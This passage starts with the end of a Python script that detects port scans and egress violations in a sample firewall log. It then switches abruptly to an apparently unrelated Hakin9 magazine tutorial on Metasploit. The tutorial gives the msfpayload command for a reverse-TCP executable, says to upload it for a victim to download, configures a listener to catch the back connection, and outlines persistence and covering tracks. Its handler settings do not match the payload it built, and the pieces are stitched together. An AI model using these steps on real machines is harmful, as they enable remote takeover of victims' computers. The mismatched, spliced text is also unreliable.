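2013-09-01T10:00:02 IN DENY 203.0.113.5:40006 -> 192.0.2.10:110
2013-09-01T10:00:02 IN DENY 203.0.113.5:40007 -> 192.0.2.10:135
2013-09-01T10:00:02 IN DENY 203.0.113.5:40008 -> 192.0.2.10:139
2013-09-01T10:00:03 IN DENY 203.0.113.5:40009 -> 192.0.2.10:443
2013-09-01T10:00:03 IN DENY 203.0.113.5:40010 -> 192.0.2.10:445
2013-09-01T10:00:03 IN DENY 203.0.113.5:40011 -> 192.0.2.10:3389
2013-09-01T10:05:00 IN DENY 198.51.100.9:51000 -> 192.0.2.10:22
2013-09-01T10:07:30 OUT ALLOW 192.0.2.10:49152 -> 198.51.100.20:443
2013-09-01T10:07:31 OUT ALLOW 192.0.2.10:49153 -> 203.0.113.5:4444
2013-09-01T10:07:45 OUT ALLOW 192.0.2.10:49154 -> 192.0.2.53:53
"""

# Assumed egress policy: the only destination ports clients may reach.
EGRESS_ALLOWED_PORTS = {53, 80, 443}


def parse_line(line):
    """Parse one log line into a dict; the '->' token is discarded."""
    ts, direction, action, src, _, dst = line.split()
    src_ip, src_port = src.rsplit(":", 1)
    dst_ip, dst_port = dst.rsplit(":", 1)
    return {
        "ts": datetime.fromisoformat(ts), "dir": direction, "action": action,
        "src_ip": src_ip, "src_port": int(src_port),
        "dst_ip": dst_ip, "dst_port": int(dst_port),
    }


def parse_log(text):
    return [parse_line(l) for l in text.splitlines() if l.strip()]


def detect_port_scans(events, window=timedelta(seconds=10), min_ports=10):
    """Return {src_ip: sorted ports} for sources that touched at least
    min_ports distinct ports on one host within `window`. Allowed and denied
    inbound attempts both count: the scan is the burst, not the denies."""
    per_pair = defaultdict(list)
    for e in events:
        if e["dir"] == "IN":
            per_pair[(e["src_ip"], e["dst_ip"])].append(e)
    hits = {}
    for (src, _dst), evs in per_pair.items():
        evs.sort(key=lambda e: e["ts"])
        best, start = set(), 0
        for end in range(len(evs)):          # sliding time window
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            ports = {e["dst_port"] for e in evs[start:end + 1]}
            if len(ports) > len(best):
                best = ports
        if len(best) >= min_ports:
            hits[src] = sorted(best)
    return hits


def egress_violations(events, allowed=EGRESS_ALLOWED_PORTS):
    """Outbound connections to ports outside the allow-list; a reverse
    connection calling home on 4444 surfaces here."""
    return [(e["src_ip"], e["dst_ip"], e["dst_port"])
            for e in events
            if e["dir"] == "OUT" and e["dst_port"] not in allowed]


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    print("port scans:", detect_port_scans(evs))
    print("egress violations:", egress_violations(evs))
```

The egress check is the practical answer to the firewall-bypass claim: when outbound traffic is restricted to an allow-list, the reverse connection has nowhere to go, and the log line for the attempt becomes the detection. The scan detector keys on (source, destination) pairs and a sliding window, so a slow scan spread over minutes needs a wider window or a lower threshold. 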

Things Required 

• Kali Linux with an updated Metasploit. 

• A place to upload your payload (I am using 
Dropbox and the shared folder of Kali Linux). 



Brief Description of Metasploit 

Metasploit (also known as MSF) is basically an open 
source framework that contains exploits and payloads 
helpful in penetration testing and also in IDS 
signature development. MSF contains a database of 
exploit code which, when run against a PC inside or 
outside the network with the corresponding 
vulnerability, produces a shell on the targeted PC 
and returns it to the attacker's machine. 

So, let's get started with the exploitation phase: 

• Open up the terminal and invoke the Metasploit 
console by running the command msfconsole, and 
wait 1-2 minutes as it takes time to load all the 
payloads, exploits etc. (Figure 18). 




Figure 18. Invoking the Metasploit terminal 

Figure 19. Generating a payload for back connection 

Figure 20. Executing the exploit 

• Meanwhile, until msfconsole has opened, open a 
new terminal to create a payload which will make a 
back connection. To create the payload, enter the 
following command (Figure 19): 

msfpayload windows/meterpreter/reverse_tcp LHOST=<Kali IP address> LPORT=4444 X > /root/Desktop/backconnection.exe 

Now upload it anywhere on the Internet; here I am 
uploading it to Dropbox just for demonstration. 

• Now come back to the Metasploit console and run 
the following commands step by step. 

Write the command use exploit/multi/handler and 
press enter (Figure 20). 

Set a payload by writing the command set payload 
windows/vncinject/reverse_tcp (Figure 21). 

Set the LHOST (local host): set LHOST 192.168.40.128 
(the Kali IP address) (Figure 22). 

Then just run the exploit: "exploit" (Figure 23). 

Now as soon as the victim downloads and runs your 
payload file from the Internet, you will get the back 
connection to his/her PC (Figure 24 and Figure 25). 

Maintaining Access 

Maintaining access is an important phase after 
gaining access to a computer system. In this step 
the attacker leaves himself an easier way to come 
back into the system later. By this step an attacker 
can return to the compromised system at any time, 
even if the service he exploited is patched. The 
Metasploit Persistent Meterpreter Service is what an 
attacker usually uses, but there is a warning when 
you use it: the persistent Meterpreter requires no 
authentication. This creates a problem: any other 
attacker who finds the same service can use the 
same port to gain access, which is not a good thing. 

Covering Tracks 

Covering tracks is the last phase of hacking. It refers 
to the actions undertaken by an attacker to extend 
his exploitation of the system without being detected. 
The reason behind covering tracks is to stay on the 
safer side and also to prolong the stay and continued 
use of resources. 

Conclusion 

In the end I would only like to conclude that, in the 
depth of crisis, hacking over the Internet is still a very 
big problem. Some hackers do it for the sake of fun 
and some for the sake of taking revenge. Therefore, 
KALI is the answer to all these problems. Kali can be 
used as an OS for penetration testing which could 
help security researchers and analysts find the bugs 
in various networks or OSes so that they can be 
made secure to some extent. 

Figure 21. Executing the payload 

Figure 22. Setting up the LHOST 

Figure 23. Setting up the exploit in msfconsole 

Figure 24. Victim tried to install our payload 

Figure 25. Successfully got the Windows shell on my Kali Linux 

Hakin9 Extra 03/2013 